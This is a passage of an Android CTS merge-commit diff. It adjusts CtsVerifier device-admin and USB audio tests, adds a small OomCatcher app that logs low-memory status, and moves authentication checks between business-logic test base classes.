Merge "Merge "Merge "Merge "Merge "[webview] fix testOnJsBeforeUnloadIsCalled flakes" into nougat-cts-dev am: a9c86effe4" into nougat-mr1-cts-dev am: 2c0d76c319" into oreo-cts-dev am: c570e7119f" into oreo-mr1-cts-dev am: 29b4f06647" into pie-cts-dev
am: 9827eb8a40
Change-Id: I8105c7aabf935d7c11fa13fbd88206f1e9bf2d01
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index f8b21fb..ad9fe6a 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.cts.verifier"
android:versionCode="5"
- android:versionName="9.0_r8">
+ android:versionName="9.0_r1">
<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="28"/>
@@ -215,7 +215,7 @@
<meta-data android:name="test_required_features"
android:value="android.software.device_admin" />
<meta-data android:name="test_excluded_features"
- android:value="android.hardware.type.watch:android.hardware.type.automotive" />
+ android:value="android.hardware.type.watch" />
</activity>
<activity android:name=".admin.ScreenLockTestActivity"
diff --git a/apps/CtsVerifier/res/values/strings.xml b/apps/CtsVerifier/res/values/strings.xml
index bd60fef..0ccd94a 100755
--- a/apps/CtsVerifier/res/values/strings.xml
+++ b/apps/CtsVerifier/res/values/strings.xml
@@ -4045,10 +4045,6 @@
<string name="uapButtonsBtnDLbl">Button D - voice assist</string>
<string name="uapButtonsRecognized">Recognized</string>
<string name="uapButtonsNotRecognized">Not Recognized</string>
- <string name="uapButtonsDisableAssistantTitle">Disable Google Assistant</string>
- <string name="uapButtonsDisableAssistant">For this test to succeed it may be necessary
- to disable the Google Assistant (Settings / Google / Search / Google Assistant Settings /
- Devices / <device name> / Google Assistant)</string>
<!-- Audio general text -->
<string name="audio_general_headset_port_exists">Does this device have a headset port?</string>
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/admin/DeviceAdminKeyguardDisabledFeaturesActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/admin/DeviceAdminKeyguardDisabledFeaturesActivity.java
index 0e82423..c8bffdf 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/admin/DeviceAdminKeyguardDisabledFeaturesActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/admin/DeviceAdminKeyguardDisabledFeaturesActivity.java
@@ -67,12 +67,11 @@
R.string.device_admin_keyguard_disable_camera_instruction,
new Intent(ByodHelperActivity.ACTION_LOCKNOW)));
}
- if(!getPackageManager().hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE)) {
- adapter.add(new DialogTestListItem(this, R.string.device_admin_disable_notifications,
- "DeviceAdmin_DisableNotifications",
- R.string.device_admin_disable_notifications_instruction,
- new Intent(ByodHelperActivity.ACTION_NOTIFICATION_ON_LOCKSCREEN)));
- }
+
+ adapter.add(new DialogTestListItem(this, R.string.device_admin_disable_notifications,
+ "DeviceAdmin_DisableNotifications",
+ R.string.device_admin_disable_notifications_instruction,
+ new Intent(ByodHelperActivity.ACTION_NOTIFICATION_ON_LOCKSCREEN)));
}
private boolean hasTrustAgents() {
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralActivity.java
index 140757d..7fdf403 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralActivity.java
@@ -44,8 +44,6 @@
protected AudioDeviceInfo mOutputDevInfo;
protected AudioDeviceInfo mInputDevInfo;
- protected final boolean mIsMandatedRequired;
-
// This will be overriden...
protected int mSystemSampleRate = 48000;
@@ -55,12 +53,9 @@
private TextView mPeripheralNameTx;
- public USBAudioPeripheralActivity(boolean mandatedRequired) {
+ public USBAudioPeripheralActivity() {
super();
- // determine if to show "UNSUPPORTED" if the mandated peripheral is required.
- mIsMandatedRequired = mandatedRequired;
-
mProfileManager.loadProfiles();
}
@@ -104,7 +99,7 @@
productName = mInputDevInfo.getProductName().toString();
}
String ctrlText;
- if (mSelectedProfile == null && mIsMandatedRequired) {
+ if (mSelectedProfile == null) {
ctrlText = productName + " - UNSUPPORTED";
} else {
ctrlText = productName;
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralAttributesActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralAttributesActivity.java
index 5029160..f12de73 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralAttributesActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralAttributesActivity.java
@@ -32,10 +32,6 @@
private TextView mTestStatusTx;
- public USBAudioPeripheralAttributesActivity() {
- super(true); // Mandated peripheral is required
- }
-
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralButtonsActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralButtonsActivity.java
index de3ce7f..87b2149 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralButtonsActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralButtonsActivity.java
@@ -16,8 +16,6 @@
package com.android.cts.verifier.audio;
-import android.app.AlertDialog;
-import android.content.DialogInterface;
import android.content.res.Resources;
import android.graphics.Color;
import android.os.Bundle;
@@ -47,23 +45,6 @@
private TextView mBtnBStatusTxt;
private TextView mBtnCStatusTxt;
- public USBAudioPeripheralButtonsActivity() {
- super(false); // Mandated peripheral is NOT required
- }
-
- private void showDisableAssistantDialog() {
- AlertDialog.Builder builder =
- new AlertDialog.Builder(this, android.R.style.Theme_Material_Dialog_Alert);
- builder.setTitle(getResources().getString(R.string.uapButtonsDisableAssistantTitle));
- builder.setMessage(getResources().getString(R.string.uapButtonsDisableAssistant));
- builder.setPositiveButton(android.R.string.yes,
- new DialogInterface.OnClickListener() {
- public void onClick(DialogInterface dialog, int which) {}
- });
- builder.setIcon(android.R.drawable.ic_dialog_alert);
- builder.show();
- }
-
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
@@ -81,12 +62,12 @@
setPassFailButtonClickListeners();
setInfoResources(R.string.usbaudio_buttons_test, R.string.usbaudio_buttons_info, -1);
-
- showDisableAssistantDialog();
}
private void showButtonsState() {
- int ctrlColor = mIsPeripheralAttached ? Color.WHITE : Color.GRAY;
+ int ctrlColor = mIsPeripheralAttached && mSelectedProfile != null
+ ? Color.WHITE
+ : Color.GRAY;
mBtnALabelTxt.setTextColor(ctrlColor);
mBtnAStatusTxt.setTextColor(ctrlColor);
mBtnBLabelTxt.setTextColor(ctrlColor);
@@ -100,13 +81,23 @@
mHasBtnB ? R.string.uapButtonsRecognized : R.string.uapButtonsNotRecognized));
mBtnCStatusTxt.setText(getString(
mHasBtnC ? R.string.uapButtonsRecognized : R.string.uapButtonsNotRecognized));
-
- calculateMatch();
}
private void calculateMatch() {
- if (mIsPeripheralAttached) {
- boolean match = mHasBtnA && mHasBtnB && mHasBtnC;
+ if (mIsPeripheralAttached && mSelectedProfile != null) {
+ ProfileButtonAttributes mButtonAttributes = mSelectedProfile.getButtonAttributes();
+ boolean match = mButtonAttributes != null;
+ boolean interceptedVolume = getResources().getBoolean(Resources.getSystem()
+ .getIdentifier("config_handleVolumeKeysInWindowManager", "bool", "android"));
+ if (match && mButtonAttributes.mHasBtnA != mHasBtnA) {
+ match = false;
+ }
+ if (match && mButtonAttributes.mHasBtnB != mHasBtnB && !interceptedVolume) {
+ match = false;
+ }
+ if (match && mButtonAttributes.mHasBtnC != mHasBtnC && !interceptedVolume) {
+ match = false;
+ }
Log.i(TAG, "match:" + match);
getPassButton().setEnabled(match);
} else {
@@ -116,27 +107,29 @@
@Override
public boolean onKeyDown(int keyCode, KeyEvent event) {
- // Log.i(TAG, "onKeyDown(" + keyCode + ")");
- switch (keyCode) {
- // Function A control event
- case KeyEvent.KEYCODE_MEDIA_PLAY_PAUSE:
- mHasBtnA = true;
- break;
-
- // Function B control event
- case KeyEvent.KEYCODE_VOLUME_UP:
- mHasBtnB = true;
- break;
-
- // Function C control event
- case KeyEvent.KEYCODE_VOLUME_DOWN:
- mHasBtnC = true;
- break;
+ Log.i(TAG, "onKeyDown(" + keyCode + ")");
+ if (mSelectedProfile != null) {
+ switch (keyCode) {
+ // Function A control event
+ case KeyEvent.KEYCODE_MEDIA_PLAY_PAUSE:
+ mHasBtnA = true;
+ break;
+
+ // Function B control event
+ case KeyEvent.KEYCODE_VOLUME_UP:
+ mHasBtnB = true;
+ break;
+
+ // Function C control event
+ case KeyEvent.KEYCODE_VOLUME_DOWN:
+ mHasBtnC = true;
+ break;
+ }
+
+ showButtonsState();
+ calculateMatch();
}
- showButtonsState();
- calculateMatch();
-
return super.onKeyDown(keyCode, event);
}
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayActivity.java
index de9016a..640d489 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayActivity.java
@@ -31,10 +31,6 @@
private Button mPlayBtn;
private LocalClickListener mButtonClickListener = new LocalClickListener();
- public USBAudioPeripheralPlayActivity() {
- super(false); // Mandated peripheral is NOT required
- }
-
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
@@ -56,8 +52,8 @@
// USBAudioPeripheralActivity
// Headset not publicly available, violates CTS Verifier additional equipment guidelines.
public void updateConnectStatus() {
- mPlayBtn.setEnabled(mIsPeripheralAttached);
- getPassButton().setEnabled(mIsPeripheralAttached);
+ mPlayBtn.setEnabled(mIsPeripheralAttached && mSelectedProfile != null);
+ getPassButton().setEnabled(mSelectedProfile != null && mOutputDevInfo != null);
}
public class LocalClickListener implements View.OnClickListener {
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayerActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayerActivity.java
index fc666aa..33417d1 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayerActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralPlayerActivity.java
@@ -41,10 +41,6 @@
private static final int WAVBUFF_SIZE_IN_SAMPLES = 2048;
- public USBAudioPeripheralPlayerActivity(boolean requiresMandatePeripheral) {
- super(requiresMandatePeripheral); // Mandated peripheral is NOT required
- }
-
protected void setupPlayer() {
mSystemBufferSize =
StreamPlayer.calcNumBurstFrames((AudioManager)getSystemService(Context.AUDIO_SERVICE));
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralRecordActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralRecordActivity.java
index 268201c..5772461 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralRecordActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/USBAudioPeripheralRecordActivity.java
@@ -49,10 +49,6 @@
private WaveScopeView mWaveView = null;
- public USBAudioPeripheralRecordActivity() {
- super(false); // Mandated peripheral is NOT required
- }
-
private void connectWaveView() {
// Log.i(TAG, "connectWaveView() rec:" + (mRecorder != null));
if (mRecorder != null) {
@@ -77,12 +73,7 @@
mRecorder.stop();
}
- // no reason to do more than 2
int numChans = USBDeviceInfoHelper.calcMaxChannelCount(mInputDevInfo);
- if (numChans > 2) {
- numChans = 2;
- }
- Log.i(TAG, " numChans:" + numChans);
if (mRecorder.open(numChans, mSystemSampleRate, mSystemBufferSize)) {
connectWaveView(); // Setup the WaveView
@@ -145,9 +136,9 @@
// USBAudioPeripheralActivity
//
public void updateConnectStatus() {
- mRecordBtn.setEnabled(mIsPeripheralAttached);
- mRecordLoopbackBtn.setEnabled(mIsPeripheralAttached);
- getPassButton().setEnabled(mIsPeripheralAttached);
+ mRecordBtn.setEnabled(mIsPeripheralAttached && mSelectedProfile != null);
+ mRecordLoopbackBtn.setEnabled(mIsPeripheralAttached && mSelectedProfile != null);
+ getPassButton().setEnabled(mSelectedProfile != null && mOutputDevInfo != null);
}
public class LocalClickListener implements View.OnClickListener {
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/AudioUtils.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/AudioUtils.java
index 55b7f9a..7190af9 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/AudioUtils.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/AudioUtils.java
@@ -32,6 +32,9 @@
}
public static int countToIndexMask(int chanCount) {
+ // From the documentation for AudioFormat:
+ // The canonical channel index masks by channel count are given by the formula
+ // (1 << channelCount) - 1.
return (1 << chanCount) - 1;
}
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/StreamRecorder.java b/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/StreamRecorder.java
index 2ec742e..7cdff34 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/StreamRecorder.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/audio/audiolib/StreamRecorder.java
@@ -120,30 +120,19 @@
mNumChannels = numChans;
mSampleRate = sampleRate;
- final int frameSize =
- AudioUtils.calcFrameSizeInBytes(AudioFormat.ENCODING_PCM_FLOAT, mNumChannels);
- final int bufferSizeInBytes = frameSize * 64; // Some, non-critical value
-
- AudioFormat.Builder formatBuilder = new AudioFormat.Builder();
- formatBuilder.setEncoding(AudioFormat.ENCODING_PCM_FLOAT);
- formatBuilder.setSampleRate(mSampleRate);
-
- if (numChans <= 2) {
- // There is currently a bug causing channel INDEX masks to fail.
- // for channels counts of <= 2, use channel POSITION
- final int chanPosMask = AudioUtils.countToInPositionMask(numChans);
- formatBuilder.setChannelMask(chanPosMask);
- } else {
- // There are no INPUT channel-position masks for > 2 channels
- final int chanIndexMask = AudioUtils.countToIndexMask(numChans);
- formatBuilder.setChannelIndexMask(chanIndexMask);
- }
-
- AudioRecord.Builder builder = new AudioRecord.Builder();
- builder.setAudioFormat(formatBuilder.build());
+ int chanIndexMask = AudioUtils.countToIndexMask(numChans);
+ int bufferSizeInBytes = 2048; // Some, non-critical value
try {
- mAudioRecord = builder.build();
+ mAudioRecord = new AudioRecord.Builder()
+ .setAudioFormat(new AudioFormat.Builder()
+ .setEncoding(AudioFormat.ENCODING_PCM_FLOAT)
+ .setSampleRate(mSampleRate)
+ .setChannelIndexMask(chanIndexMask)
+ .build())
+ .setBufferSizeInBytes(bufferSizeInBytes)
+ .build();
+
return true;
} catch (UnsupportedOperationException ex) {
Log.e(TAG, "Couldn't open AudioRecord: " + ex);
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/location/GpsTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/location/GpsTestActivity.java
index c779a2a..4909497 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/location/GpsTestActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/location/GpsTestActivity.java
@@ -19,8 +19,6 @@
import com.android.cts.verifier.PassFailButtons;
import com.android.cts.verifier.R;
-import com.android.compatibility.common.util.CddTest;
-
import android.content.Context;
import android.graphics.Color;
import android.graphics.Typeface;
@@ -43,7 +41,6 @@
/**
* CTS Verifier case for verifying GPS.
*/
-@CddTest(requirement="7.3.3/C-1-1")
public class GpsTestActivity extends PassFailButtons.Activity implements PassFailLog {
private LocationManager mLocationManager;
private TextView mTextView;
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/EnterprisePrivacyTestListActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/EnterprisePrivacyTestListActivity.java
index 519d50b..3a16297 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/EnterprisePrivacyTestListActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/EnterprisePrivacyTestListActivity.java
@@ -312,22 +312,20 @@
CommandReceiverActivity.COMMAND_SET_ORGANIZATION_NAME)
.putExtra(CommandReceiverActivity.EXTRA_ORGANIZATION_NAME,
"Foo, Inc."))}));
- if(!getPackageManager().hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE)) {
- adapter.add(createInteractiveTestItem(this, ENTERPRISE_PRIVACY_KEYGUARD,
- R.string.enterprise_privacy_keyguard,
- R.string.enterprise_privacy_keyguard_info,
- new ButtonInfo[]{
- new ButtonInfo(R.string.enterprise_privacy_open_settings,
- new Intent(Settings.ACTION_SETTINGS)),
- new ButtonInfo(R.string.enterprise_privacy_clear_organization,
- buildCommandIntent(
- CommandReceiverActivity.COMMAND_SET_ORGANIZATION_NAME)),
- new ButtonInfo(R.string.enterprise_privacy_set_organization,
- buildCommandIntent(
- CommandReceiverActivity.COMMAND_SET_ORGANIZATION_NAME)
- .putExtra(CommandReceiverActivity.EXTRA_ORGANIZATION_NAME,
- "Foo, Inc."))}));
- }
+ adapter.add(createInteractiveTestItem(this, ENTERPRISE_PRIVACY_KEYGUARD,
+ R.string.enterprise_privacy_keyguard,
+ R.string.enterprise_privacy_keyguard_info,
+ new ButtonInfo[] {
+ new ButtonInfo(R.string.enterprise_privacy_open_settings,
+ new Intent(Settings.ACTION_SETTINGS)),
+ new ButtonInfo(R.string.enterprise_privacy_clear_organization,
+ buildCommandIntent(
+ CommandReceiverActivity.COMMAND_SET_ORGANIZATION_NAME)),
+ new ButtonInfo(R.string.enterprise_privacy_set_organization,
+ buildCommandIntent(
+ CommandReceiverActivity.COMMAND_SET_ORGANIZATION_NAME)
+ .putExtra(CommandReceiverActivity.EXTRA_ORGANIZATION_NAME,
+ "Foo, Inc."))}));
adapter.add(createInteractiveTestItem(this, ENTERPRISE_PRIVACY_ADD_ACCOUNT,
R.string.enterprise_privacy_add_account,
R.string.enterprise_privacy_add_account_info,
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
index 6637509..31a8791 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
@@ -110,14 +110,12 @@
}
protected void setupDisableUnredactedWorkNotification(ArrayTestListAdapter adapter) {
- if(!getPackageManager().hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE)) {
- adapter.add(new DialogTestListItemWithIcon(this,
- R.string.provisioning_byod_disable_unredacted_notifications,
- getTestIdPrefix() + "DisableUnredactedNotifications",
- R.string.provisioning_byod_disable_unredacted_notifications_instruction,
- new Intent(ByodHelperActivity.ACTION_NOTIFICATION_ON_LOCKSCREEN),
- R.drawable.ic_corp_icon));
- }
+ adapter.add(new DialogTestListItemWithIcon(this,
+ R.string.provisioning_byod_disable_unredacted_notifications,
+ getTestIdPrefix() + "DisableUnredactedNotifications",
+ R.string.provisioning_byod_disable_unredacted_notifications_instruction,
+ new Intent(ByodHelperActivity.ACTION_NOTIFICATION_ON_LOCKSCREEN),
+ R.drawable.ic_corp_icon));
}
protected void setupFingerprintTests(ArrayTestListAdapter adapter) {
diff --git a/apps/OomCatcher/Android.mk b/apps/OomCatcher/Android.mk
new file mode 100644
index 0000000..7f47e03
--- /dev/null
+++ b/apps/OomCatcher/Android.mk
@@ -0,0 +1,33 @@
+#
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH:= $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := OomCatcher
+
+LOCAL_SDK_VERSION := current
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+
+include $(BUILD_CTS_PACKAGE)
+
diff --git a/apps/OomCatcher/AndroidManifest.xml b/apps/OomCatcher/AndroidManifest.xml
new file mode 100644
index 0000000..25513e2
--- /dev/null
+++ b/apps/OomCatcher/AndroidManifest.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.oomcatcher"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <application>
+ <activity android:name=".OomCatcher">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+</manifest>
diff --git a/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
new file mode 100644
index 0000000..32590b4
--- /dev/null
+++ b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
@@ -0,0 +1,113 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.android.cts.oomcatcher;
+
+import android.app.Activity;
+import android.os.Bundle;
+import android.app.ActivityManager;
+import android.content.Context;
+import android.content.ComponentCallbacks2;
+import android.util.Log;
+import java.util.concurrent.atomic.AtomicBoolean;
+
+/*
+ * An App to report to logcat the lowmemory status. As soon as the app detects low memory, it
+ * immediately reports. In addition, it also reports every second.
+ */
+public class OomCatcher extends Activity implements ComponentCallbacks2 {
+
+ private static final String LOG_TAG = "OomCatcher";
+
+ private AtomicBoolean isOom = new AtomicBoolean(false);
+
+ Thread logThread;
+
+ public void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ logThread = new Thread() {
+ @Override
+ public void run() {
+ while (true) {
+ logStatus();
+ try {
+ Thread.sleep(1000); // 1 second
+ } catch (InterruptedException e) {
+ // thread has been killed
+ }
+ }
+ }
+ };
+ logThread.setDaemon(true);
+ logThread.start();
+ }
+
+ public void onDestroy() {
+ if (logThread != null) {
+ logThread.interrupt();
+ }
+ }
+
+ /*
+ * Receive memory callbacks from the Android system. All report low memory except for
+ * TRIM_MEMORY_UI_HIDDEN, which reports when the app is in the background. We don't care about
+ * that, only when the device is at risk of OOMing.
+ *
+ * For all indications of low memory, onLowMemory() is called.
+ */
+ @Override
+ public void onTrimMemory(int level) {
+ Log.i(LOG_TAG, "Memory trim level: " + level);
+ switch (level) {
+ // background messages
+ case TRIM_MEMORY_MODERATE:
+ case TRIM_MEMORY_COMPLETE:
+ // foreground messages
+ case TRIM_MEMORY_RUNNING_LOW:
+ case TRIM_MEMORY_RUNNING_CRITICAL:
+ // fallthrough
+ onLowMemory();
+ break;
+ case TRIM_MEMORY_UI_HIDDEN:
+ Log.i(LOG_TAG, "UI is hidden because the app is in the background.");
+ break;
+ // lower priority messages being ignored
+ case TRIM_MEMORY_BACKGROUND:
+ case TRIM_MEMORY_RUNNING_MODERATE:
+ // fallthrough
+ Log.i(LOG_TAG, "ignoring low priority oom messages.");
+ break;
+ default:
+ Log.i(LOG_TAG, "unknown memory trim message.");
+ return;
+ }
+ }
+
+ /*
+ * An earlier API implementation of low memory callbacks. Sets oom status and logs.
+ */
+ @Override
+ public void onLowMemory() {
+ isOom.set(true);
+ logStatus();
+ }
+
+ /*
+ * Log to logcat the current lowmemory status of the app.
+ */
+ private void logStatus() {
+ Log.i(LOG_TAG, isOom.get() ? "Low memory" : "Normal memory");
+ }
+}
diff --git a/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicConditionalTestCase.java b/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicConditionalTestCase.java
deleted file mode 100644
index d12caa8..0000000
--- a/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicConditionalTestCase.java
+++ /dev/null
@@ -1,54 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package com.android.compatibility.common.util;
-
-import org.junit.Before;
-
-/**
- * Device-side base class for tests leveraging the Business Logic service for rules that are
- * conditionally added based on the device characteristics.
- */
-public class BusinessLogicConditionalTestCase extends BusinessLogicTestCase {
-
- @Override
- @Before
- public void handleBusinessLogic() {
- super.loadBusinessLogic();
- ensureAuthenticated();
- super.executeBusinessLogic();
- }
-
- protected void ensureAuthenticated() {
- if (!mCanReadBusinessLogic) {
- // super class handles the condition that the service is unavailable.
- return;
- }
-
- if (!mBusinessLogic.mConditionalTestsEnabled) {
- skipTest("Execution of device specific tests is not enabled. "
- + "Enable with '--conditional-business-logic-tests-enabled'");
- }
-
- if (mBusinessLogic.isAuthorized()) {
- // Run test as normal.
- return;
- }
- String message = mBusinessLogic.getAuthenticationStatusMessage();
-
- // Fail test since request was not authorized.
- failTest(String.format("Unable to execute because %s.", message));
- }
-}
diff --git a/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java b/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java
index 671d33b..29607c3 100644
--- a/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java
+++ b/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java
@@ -51,6 +51,7 @@
@Before
public void handleBusinessLogic() {
loadBusinessLogic();
+ ensureAuthenticated();
executeBusinessLogic();
}
@@ -79,6 +80,27 @@
}
}
+ protected void ensureAuthenticated() {
+ if (!mCanReadBusinessLogic) {
+ // super class handles the condition that the service is unavailable.
+ return;
+ }
+
+ if (!mBusinessLogic.mConditionalTestsEnabled) {
+ skipTest("Execution of device specific tests is not enabled. "
+ + "Enable with '--conditional-business-logic-tests-enabled'");
+ }
+
+ if (mBusinessLogic.isAuthorized()) {
+ // Run test as normal.
+ return;
+ }
+ String message = mBusinessLogic.getAuthenticationStatusMessage();
+
+ // Fail test since request was not authorized.
+ failTest(String.format("Unable to execute because %s.", message));
+ }
+
protected static Instrumentation getInstrumentation() {
return InstrumentationRegistry.getInstrumentation();
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityPreparer.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityPreparer.java
index 758e6af..797ffcb 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityPreparer.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityPreparer.java
@@ -71,10 +71,8 @@
private void removeSecondaryUsers(ITestDevice device) throws DeviceNotAvailableException {
final int[] userIds = Utils.getAllUsers(device);
for (int i = 1; i < userIds.length; i++) {
- if (device.getCurrentUser() != userIds[i]) {
- device.removeUser(userIds[i]);
- CLog.logAndDisplay(LogLevel.INFO, "Destroyed secondary user " + userIds[i]);
- }
+ device.removeUser(userIds[i]);
+ CLog.logAndDisplay(LogLevel.INFO, "Destroyed secondary user " + userIds[i]);
}
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
index f8f866d..3231d0c 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
@@ -173,15 +173,14 @@
assertNull(String.format("failed to install app with data. Reason: %s", installResult),
installResult);
// run appwithdata's tests to create private data
- runDeviceTestsAsCurrentUser(
- APP_WITH_DATA_PKG, APP_WITH_DATA_CLASS, APP_WITH_DATA_CREATE_METHOD);
